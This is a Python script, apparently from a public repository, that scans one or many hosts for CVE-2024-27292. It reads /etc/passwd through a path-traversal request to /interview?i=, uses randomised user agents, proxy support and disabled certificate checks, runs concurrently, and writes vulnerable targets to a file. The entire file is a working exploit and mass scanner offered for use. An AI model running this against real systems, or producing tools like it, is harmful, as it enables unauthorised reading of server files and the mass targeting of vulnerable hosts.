# README.md
# Rendering markdown...
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
from fake_useragent import UserAgent
from colorama import Fore, Style
import ssl
import httpx
import random
import os
# Colour and style codes (from colorama) used to decorate console output.
green, magenta, cyan = Fore.GREEN, Fore.MAGENTA, Fore.CYAN
red, blue, yellow, white = Fore.RED, Fore.BLUE, Fore.YELLOW, Fore.WHITE
mixed = red + blue  # both foreground codes concatenated, red first
reset, bold = Style.RESET_ALL, Style.BRIGHT

# The banner colour is drawn once, at import time, from this palette.
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
    """Build the coloured start-up banner.

    Returns:
        str: The ASCII-art logo followed by the CVE identifier and the
        author handle, wrapped in the module-level colour codes.
    """
    # Every backslash in the art is written doubled. Single backslashes
    # followed by a space, underscore or pipe are invalid escape sequences in
    # a non-raw literal (SyntaxWarning on Python 3.12+); doubling them yields
    # exactly the same runtime text without the warning.
    art = f"""{bold}{random_color}
____ __ __ _____ _ _ _
/ ___|\\ \\ / /| ____|| | | | _ _ _ __ | |_ ___ _ __
| | \\ \\ / / | _| | |_| || | | || '_ \\ | __| / _ \\| '__|
| |___ \\ V / | |___ | _ || |_| || | | || |_ | __/| |
\\____| \\_/ |_____||_| |_| \\__,_||_| |_| \\__| \\___||_|
CVE-2024-27292 {bold}{white}@th3gokul{reset}\n"""
    return art
# Show the banner before argparse produces any output of its own.
print(banner())

# Command-line interface. The automatic usage line is suppressed; every option
# is described through its coloured help text instead.
parser = argparse.ArgumentParser(
    description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-27292",
    usage=argparse.SUPPRESS,
)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
# The original help text ended with a stray "]" after the colour reset.
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}")
args = parser.parse_args()

# --threads sizes the concurrency semaphore: 0 would block the very first
# acquire forever and a negative value is rejected by asyncio, so fail early
# with a clear message instead.
if args.threads < 1:
    parser.error("--threads must be a positive integer")
async def save(result):
    """Append one result line to the output file.

    The destination is ``args.output`` when that option was given (or
    ``results.txt`` inside it when it names an existing directory), and
    ``results.txt`` in the current working directory otherwise.

    Args:
        result: Text to append; a newline is added after it.

    Write failures are reported on the console rather than raised, so a
    problem with the output file does not abort the scan.
    """
    filename = "results.txt"
    if args.output:
        filename = args.output
        if os.path.isdir(filename):
            filename = os.path.join(filename, "results.txt")

    try:
        async with aiofiles.open(filename, "a") as handle:
            await handle.write(result + "\n")
    except KeyboardInterrupt:
        # Same effect as the former quit(), without relying on the
        # site-injected helper.
        raise SystemExit from None
    except asyncio.CancelledError:
        # Cancellation must reach the caller; the previous bare `SystemExit`
        # expression silently discarded it.
        raise
    except Exception as exc:
        # Best effort, but never silent: a lost finding is worth a warning.
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}could not write to {filename}: {exc}{reset}")
async def exploit(session, url, sem, bar):
    """Probe a single target for CVE-2024-27292.

    Requests ``<url>/interview?i=/etc/passwd`` and reports the target as
    vulnerable (console line plus ``save``) when the response body contains
    ``root:``.

    Args:
        session: HTTP client exposing ``stream`` (an ``httpx.AsyncClient``).
        url: Base URL of the target, including its scheme.
        sem: Semaphore slot held on behalf of this probe; always released
            here.
        bar: Progress callback, invoked exactly once when the probe ends.

    Raises:
        asyncio.CancelledError: Re-raised so the task is marked as cancelled.
    """
    try:
        # Trim trailing slashes so the probe path is not built as "//interview".
        probe_url = f"{url.rstrip('/')}/interview?i=/etc/passwd"
        headers = {"User-Agent": UserAgent().random}
        async with session.stream(
            "GET", probe_url, headers=headers, follow_redirects=True, timeout=30
        ) as response:
            raw = await response.aread()

        # Decode leniently: with strict decoding a body that is not valid
        # UTF-8 raised UnicodeDecodeError and the target was skipped unchecked.
        body = raw.decode("utf-8", errors="replace")
        if "root:" in body:
            print(f"{bold}{white}[vuln]: {url}{reset}")
            await save(f"Vulnerable: {probe_url}")
    except httpx.RequestError:
        # RequestError is the base class of ConnectError and TimeoutException,
        # so this single clause covers the three types listed before.
        if args.verbose:
            print(f"[{bold}{red}Timeout{reset}]: {bold}{white}{url}{reset}")
    except (ssl.SSLError, httpx.InvalidURL):
        # Unusable target; skipped without output, as before.
        pass
    except asyncio.CancelledError:
        # Previously swallowed by a no-op `SystemExit` expression.
        raise
    except Exception as exc:
        if args.verbose:
            print(f"Exception in exploit: {exc}, {type(exc)}")
    finally:
        # Release the slot even if the progress callback itself fails,
        # otherwise the dispatcher would wait on the semaphore forever.
        try:
            bar()
        finally:
            sem.release()
async def loader(urls, session, sem, bar):
    """Start one ``exploit`` task per URL and wait for all of them.

    A semaphore slot is acquired before each task is created and is released
    by ``exploit`` when it finishes, so the semaphore bounds how many probes
    are in flight at once.

    Args:
        urls: Iterable of target URLs.
        session: HTTP client passed through to ``exploit``.
        sem: Semaphore limiting concurrency.
        bar: Progress callback passed through to ``exploit``.
    """
    tasks = []
    try:
        for url in urls:
            await sem.acquire()
            tasks.append(asyncio.create_task(exploit(session, url, sem, bar)))
        await asyncio.gather(*tasks, return_exceptions=False)
    except (KeyboardInterrupt, asyncio.CancelledError):
        # Interrupted: stop the probes that are still running and collect
        # them so none is left pending, then return quietly as before.
        for task in tasks:
            task.cancel()
        await asyncio.gather(*tasks, return_exceptions=True)
    except Exception as exc:
        if args.verbose:
            print(f"Exception in loader: {exc}, {type(exc)}")
async def threads(urls):
    """Scan ``urls`` concurrently behind a shared client and progress bar.

    Args:
        urls: Target URLs; duplicates are dropped, first occurrence wins.
    """
    try:
        # dict.fromkeys removes duplicates while keeping the input order, so
        # the scan order is deterministic (a set would shuffle it).
        targets = list(dict.fromkeys(urls))
        # A semaphore of 0 would block the first acquire forever and a
        # negative value is rejected outright; always allow at least one probe.
        sem = asyncio.BoundedSemaphore(max(1, args.threads))
        proxy = args.proxy or None
        # verify=False: certificate verification is switched off for all probes.
        async with httpx.AsyncClient(verify=False, proxy=proxy) as session:
            with alive_bar(title="CVEHunter", total=len(targets), enrich_print=False) as bar:
                await loader(targets, session, sem, bar)
    except KeyboardInterrupt:
        # Stop quietly on Ctrl-C, as before.
        pass
    except Exception as exc:
        # RuntimeError used to be discarded silently; it is now reported like
        # any other failure when --verbose is set.
        if args.verbose:
            print(f"Exception in threads: {exc}, {type(exc)}")
def _expand_target(raw):
    """Return the URL(s) to probe for one user-supplied target.

    A target that already starts with ``http://`` or ``https://`` is used as
    is; anything else is tried over both HTTPS and HTTP. Blank input yields
    an empty list.
    """
    target = raw.strip()
    if not target:
        return []
    if target.startswith(("https://", "http://")):
        return [target]
    return [f"https://{target}", f"http://{target}"]


async def main():
    """Collect targets from ``--url`` and/or ``--list`` and scan them.

    All targets are gathered first and scanned in a single pass. Previously
    the ``--url`` target was scanned a second time whenever ``--list`` was
    also given, and blank lines in the list file became bogus targets.
    """
    try:
        urls = []
        if args.url:
            urls.extend(_expand_target(args.url))

        if args.list:
            try:
                async with aiofiles.open(args.list, "r") as stream:
                    async for line in stream:
                        urls.extend(_expand_target(line))
            except FileNotFoundError:
                # A missing list file must not prevent scanning a --url target.
                print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")

        if urls:
            await threads(urls)
    except Exception as exc:
        print(f"Exception in main: {exc}, {type(exc)}")
if __name__ == "__main__":
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        # Ctrl-C: leave quietly instead of dumping a traceback.
        # 130 is the conventional exit status for SIGINT (128 + 2).
        raise SystemExit(130) from None